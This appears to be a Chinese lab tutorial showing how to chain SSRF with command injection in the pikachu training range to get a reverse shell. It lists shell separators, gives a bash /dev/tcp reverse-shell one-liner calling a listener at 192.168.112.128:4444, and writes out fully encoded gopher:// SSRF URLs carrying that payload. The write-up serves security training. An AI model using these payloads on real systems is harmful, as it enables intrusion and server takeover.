SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳

一.RCE远程命令执行漏洞的介绍

可直接在目标服务器上执行任意命令---接管服务器

该漏洞主要有命令执行函数引起:例如:system:()函数

system("ping 用户提供的参数")

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第1张图片

以下为以下执行符号:

1.;   指顺序执行

2.&    后台执行

3.&&  与条件执行

4.|      管道符执行

5.||     或条件执行

例如我们以”;“举例:

baidu.com;bash -i >& /dev/tcp/192.168.112.128/4444 0>&1

就是我们先执行平baidu.com 然后顺序执行后面的反弹shell:

二.下面我们开始实验

我们先kali开启监听:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第2张图片

然后我们打开pikachu靶场:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第3张图片

执行命令后,查看kali:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第4张图片

可以看到我们成功的执行了bash -i >& /dev/tcp/192.168.112.128/4444 0>&1

并且在kali上获得了shell:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第5张图片下面我们利用bp获取其POST请求;

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第6张图片复制利用脚本编码:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第7张图片

构造URL:

gopher://192.168.112.12/_POST%20/pikachu-master/vul/rce/rce_ping.php%20HTTP/1.1%0D%0AHost%3A%20192.168.112.12%0D%0AContent-Length%3A%2095%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0A%0D%0Aipaddress%3Dbaidu.com%253Bbash%2B-i%2B%253E%2526%2B%252Fdev%252Ftcp%252F192.168.112.128%252F4444%2B0%253E%25261%26submit%3Dping%0D%0A

然后我们到pikachu靶场里进行ssrf漏洞利用gopher协议执行RCE远程命令执行漏洞:

进行一次编码:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第8张图片

构造完成的URL:http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3A%2F%2F192.168.112.12%3A80%2F_POST%2520%2Fpikachu-master%2Fvul%2Frce%2Frce_ping.php%2520HTTP%2F1.1%250D%250AHost%253A%2520192.168.112.12%250D%250AContent-Length%253A%252095%250D%250AContent-Type%253A%2520application%2Fx-www-form-urlencoded%250D%250A%250D%250Aipaddress%253Dbaidu.com%25253Bbash%252B-i%252B%25253E%252526%252B%25252Fdev%25252Ftcp%25252F192.168.112.128%25252F4444%252B0%25253E%2525261%2526submit%253Dping%250D%250A

看到左上角一直在转,那就是成了:

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳_第9张图片

以上我们的实验完毕。

总结:摘RCE漏洞通过命令执行函数(如system())在目标服务器执行任意命令,利用特殊符号(; & |等)拼接恶意代码。实验演示了利用pikachu靶场和gopher协议构造恶意请求,通过SSRF漏洞触发RCE,成功获取反弹shell。关键步骤包括监听端设置、命令编码和请求构造,最终实现远程服务器控制。该漏洞危害严重,需严格过滤用户输入。

 

你可能感兴趣的:(ssrf,ssrf,进阶,bp,安全,getshell,RCE,漏洞)